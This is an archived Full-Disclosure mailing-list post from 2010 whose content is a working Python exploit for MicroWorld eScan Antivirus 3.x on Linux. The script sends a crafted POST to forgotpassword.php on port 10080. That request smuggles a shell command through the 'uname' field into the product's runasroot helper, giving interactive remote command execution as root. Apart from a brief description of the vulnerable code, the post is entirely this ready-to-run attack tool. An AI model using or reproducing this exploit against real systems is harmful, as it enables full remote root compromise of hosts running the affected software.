lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <c5ce5c461003160538g22fd1b0s4bad52f90c605882@mail.gmail.com>
Date: Tue, 16 Mar 2010 15:38:44 +0300
From: mohammed sa <sa.attacker@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: MicroWorld eScan Antivirus 3.x Remote Root
	Command Execution

#!/usr/bin/env python
import sys
from socket import *

#auther: Mohammed almutairi
#(Sa.attacker@...il.com)
"""
MicroWorld eScan Antivirus < 3.x  Remote Root Command Execution
Package MWADMIN package vulnerabilities (linux)
The Base Packages (MWADMIN and MWAV) must be installed before eScan
Link:
http://www.escanav.com/english/content/products/escan_linux/linux_products.asp
infcted: aLL version 3.X eScan linux
1-Escan for Linux Desktop
2-Escan for Linux file Servers
3-MailScan for Linux and webscan
Tested On RedHat  and Fedora
ULTRA PRIV8 :)

Description:

>>From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
include("common_functions.php");  <---> (1)

if ($_POST['forgot'] == "Send Password")
{
        $user = $_POST["uname"]; <--->(2) insecure:(


vulnerable code in forgotpassword.php and common_functions.php
in (1) $runasroot = "/opt/MicroWorld/sbin/runasroot";
we can injection through via the file forgotpassword.php As you can see (2)
with  remote root Command Execution
>> eScan.py www.***.com
eScan@...n/sh:$Sa$ => reboot
[*] Done! sent to: www.***.com
"""

def xpl():
	if len(sys.argv) < 2:
                print "[*] MicroWorld eScan Antivirus Remote Root
Command Execution"
                print "[*] exploited by Mohammed almutairi"
		print "[*] usage: %s host" % sys.argv[0]
		return

	host = sys.argv[1]
	port = 10080 # default port
	cmd = raw_input("eScan@...n/sh:$Sa$ => ")
	sock=socket(AF_INET, SOCK_STREAM)
	sock.connect((host,port))
        sh="/opt/MicroWorld/sbin/runasroot /bin/sh -c '%s'" % cmd

        sa= "uname=;%s;" %sh # (;sh;)  ---> Here Play See to ^(2)^
        sa+= "&forgot=Send+Password"

        s="POST /forgotpassword.php HTTP/1.1\r\n"
        s+="Host: %s:%d\r\n"%(host, port)
        s+="User-Agent: */*\r\n"
        s+="Accept: ar,en-us;q=0.7,en;q=0.3\r\n"
        s+="Content-Type: application/x-www-form-urlencoded\r\n"
        s+="Content-Length: %d \r\n\r\n"%len(sa)
        s+=sa

	sock.sendall(s)
	print "[*] Done! sent to: %s" % host
	sock.close()

if __name__=="__main__":
        xpl()
	sys.exit(0)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ